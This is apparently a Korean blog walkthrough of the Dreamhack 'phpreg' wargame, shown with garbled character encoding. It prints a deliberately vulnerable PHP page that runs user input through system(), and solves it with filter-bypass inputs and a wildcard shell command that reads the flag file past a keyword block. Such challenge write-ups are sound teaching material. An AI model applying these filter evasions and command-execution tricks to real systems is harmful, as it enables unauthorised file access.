๐Ÿ”’ Cyber Security/Web Hacking (์›นํ•ดํ‚น)

[Dreamhack] ๋“œ๋ฆผํ•ต ์›นํ•ดํ‚น : phpreg

์„ ๋‹ฌ 2023. 11. 6. 16:50
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/873

 

phpreg

Description php๋กœ ์ž‘์„ฑ๋œ ํŽ˜์ด์ง€์ž…๋‹ˆ๋‹ค. ์•Œ๋งž์€ Nickname๊ณผ Password๋ฅผ ์ž…๋ ฅํ•˜๋ฉด Step 2๋กœ ๋„˜์–ด๊ฐˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Step 2์—์„œ system() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜์—ฌ ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” ../dream/flag.txt์— ์œ„์น˜ํ•ฉ๋‹ˆ

dreamhack.io

 

 

๋ฌธ์ œ์„ค๋ช…

php๋กœ ์ž‘์„ฑ๋œ ํŽ˜์ด์ง€์ž…๋‹ˆ๋‹ค.

์•Œ๋งž์€ Nickname๊ณผ Password๋ฅผ ์ž…๋ ฅํ•˜๋ฉด Step 2๋กœ ๋„˜์–ด๊ฐˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Step 2์—์„œ system() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•˜์—ฌ ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”.

ํ”Œ๋ž˜๊ทธ๋Š” ../dream/flag.txt์— ์œ„์น˜ํ•ฉ๋‹ˆ๋‹ค.

ํ”Œ๋ž˜๊ทธ์˜ ํ˜•์‹์€ DH{…} ์ž…๋‹ˆ๋‹ค.

 

ํ’€์ด

          // POST request
          if ($_SERVER["REQUEST_METHOD"] == "POST") {
            $input_name = $_POST["input1"] ? $_POST["input1"] : "";
            $input_pw = $_POST["input2"] ? $_POST["input2"] : "";

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }
            else{
              $name = preg_replace("/nyang/i", "", $input_name);
              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);
              
              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

                $cmd = $_POST["cmd"] ? $_POST["cmd"] : "";

                if ($cmd === "") {
                  echo '
                        <p><form method="post" action="/step2.php">
                            <input type="hidden" name="input1" value="'.$input_name.'">
                            <input type="hidden" name="input2" value="'.$input_pw.'">
                            <input type="text" placeholder="Command" name="cmd">
                            <input type="submit" value="์ œ์ถœ"><br/><br/>
                        </form></p>
                  ';
                }
                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }
              }
              else{
                echo "Wrong nickname or pw";
              }
            }
          }
          // GET request
          else{
            echo "Not GET request";
          }

index.php ๋Š” ๋ณ„ ๋‚ด์šฉ์ด ์—†์–ด์„œ step2.php ์ฝ”๋“œ์—์„œ php ๋ถ€๋ถ„๋งŒ ๊ฐ€์ ธ์™”๋‹ค

 

Step 1

              if ($name === "dnyang0310" && $pw === "d4y0r50ng+1+13") {
                echo '<h4>Step 2 : Almost done...</h4><div class="door_box"><div class="door_black"></div><div class="door"><div class="door_cir"></div></div></div>';

์•„์ด๋””๋Š” dnyang0310

๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” d4y0r50ng+1+13

์ด๋‹ค

 

๋น„๋ฐ€๋ฒˆํ˜ธ ์šฐํšŒ

            // pw filtering
            if (preg_match("/[a-zA-Z]/", $input_pw)) {
              echo "alphabet in the pw :(";
            }

 

๊ทผ๋ฐ ์–ด์ด์—†๊ฒŒ๋„ ๋น„๋ฐ€๋ฒˆํ˜ธ์— ์•ŒํŒŒ๋ฒณ์ด ์žˆ์œผ๋ฉด ์•ˆ๋˜๊ฒŒ ์ฒ˜๋ฆฌํ•ด๋†จ๋‹ค

 

              $pw = preg_replace("/\d*\@\d{2,3}(31)+[^0-8\"]\!/", "d4y0r50ng", $input_pw);

 

๊ทธ ์œ„์— \d*\@\d{2,3}(31)+[^0-8\"]\! ๋ผ๋Š” ์ •๊ทœ์‹์„ ๋งŒ์กฑํ•˜๋ฉด d4์–ด์ฉŒ๊ตฌ๋กœ ์ธ์‹ํ•˜๊ฒŒ ํ•ด๋†จ์œผ๋‹ˆ ์ด์šฉํ•ด๋ณด์ž

 

- \d* : 0๊ฐœ ์ด์ƒ ์ˆซ์ž

- \@ : ๊ธฐํ˜ธ @

- \d{2,3} : ์ˆซ์ž 2~3๊ฐœ

- (31)+ : 31์ด๋ผ๋Š” ์ˆซ์ž 1๋ฒˆ ์ด์ƒ ๋ฐ˜๋ณต

- [^0-8\"] : ๋ฌธ์ž ์•„๋ฌด๊ฑฐ๋‚˜ (๋‹จ 0~8 ์ˆซ์ž ๋˜๋Š” ๊ธฐํ˜ธ " ์ œ์™ธ)

- \! : ๊ธฐํ˜ธ !

 

๋Œ€์ถฉ 0@12319! ๋กœ ์ •๊ทœ์‹์— ๋งŒ์กฑํ•˜๋Š” ๋ฌธ์ž์—ด์„ ๋งŒ๋“ค์—ˆ๊ณ  

๋น„๋ฒˆ์œผ๋กœ 0@12319!+1+13์„ ์ž…๋ ฅํ•˜์ž

 

์•„์ด๋”” ์šฐํšŒ

              $name = preg_replace("/nyang/i", "", $input_name);

nyang์ด๋ผ๋Š” ๋ฌธ์ž์—ด์ด ์žˆ์œผ๋ฉด ์—†์• ๋ฒ„๋ฆฌ๊ฒŒ ๋งŒ๋“ค์–ด๋†จ๋‹ค

์ฆ‰ dnyang0310 ์ด๋ผ๋Š” ์•„์ด๋””๋ฅผ ์ž…๋ ฅํ•ด๋„ d0310 ์œผ๋กœ ๋“ค์–ด๊ฐ€๋ฒ„๋ฆฐ๋‹ค

๊ทธ๋Ÿผ ์—†์• ๋ฒ„๋ฆฐ ํ›„์— dnyang0310 ์ด ๋˜๋„๋ก dnnyangyang0310 ์œผ๋กœ ๋งŒ๋“ค์–ด์ฃผ์ž

 

๊ฒฐ๊ตญ

์•„์ด๋”” : dnnyangyang0310

๋น„๋ฐ€๋ฒˆํ˜ธ : 0@12319!+1+13

 

์žฌ๋ฐŒ๋‹ค

 

Step2

์ด์ œ ๊ทธ๋ƒฅ ์‹œ์Šคํ…œ ์ปค๋งจ๋“œ๋งŒ ์ž…๋ ฅํ•˜๋ฉด ๋œ๋‹ค

์ด๋ ‡๊ฒŒ ์ปค๋งจ๋“œ์ฐฝ์ด๋ž‘ ๋˜‘๊ฐ™๋‹ค

๋ฌธ์ œ์— ํ”Œ๋ž˜๊ทธ์˜ ์œ„์น˜๋Š” ../dream/flag.txt 

๋ผ๊ณ  ํ–ˆ์œผ๋ฏ€๋กœ ์ž˜ ์ฐพ์•„๊ฐ€์„œ flag.txt๋ฅผ ์ฝ์ž

 

cd ../dream; cat flag.txt

 

์•„๋†”

 

๋ญ”๊ฐ€ ๋ฌธ์ œ๊ฐ€ ์žˆ๋‹ค

์ฝ”๋“œ๋ฅผ ํ•œ๋ฒˆ ๋” ๋ณด์ž

                // cmd filtering
                else if (preg_match("/flag/i", $cmd)) {
                  echo "<pre>Error!</pre>";
                }
                else{
                  echo "<pre>--Output--\n";
                  system($cmd);
                  echo "</pre>";
                }

 

flag๋ผ๋Š” ๋ฌธ์ž๊ฐ€ ๋“ค์–ด๊ฐ€์žˆ์œผ๋ฉด Error ๊ฐ€ ๋œจ๋„๋ก ์ฒ˜๋ฆฌํ•ด๋†จ๋‹ค

๊ทธ๋Ÿผ flag๋ผ๋Š” ๋‹จ์–ด๋ฅผ ์“ฐ์ง€ ์•Š๋Š” ๋ช…๋ น์–ด๋กœ ์ ‘๊ทผํ•ด๋ณด์ž

 

cd ../dream; cat ????.txt

 

cat ์— ๋ฌผ์Œํ‘œ๋ฅผ ๋„ฃ์œผ๋ฉด ๊ทธ ๋ฌผ์Œํ‘œ์— ์•„๋ฌด๊ฑฐ๋‚˜ ๋“ค์–ด๊ฐ„ ๋ฌธ์ž์—ด๋กœ ์•Œ์•„์„œ ์ฐพ์•„ ์ถœ๋ ฅํ•ด์ค€๋‹ค

 

์•„์ฃผ ์žฌ๋ฐŒ๋‹ค

์ดˆ๋ณด ํ•ด์ปค๋“ค์—๊ฒŒ ๊ฐ•์ถ” !!

๋ฐ˜์‘ํ˜•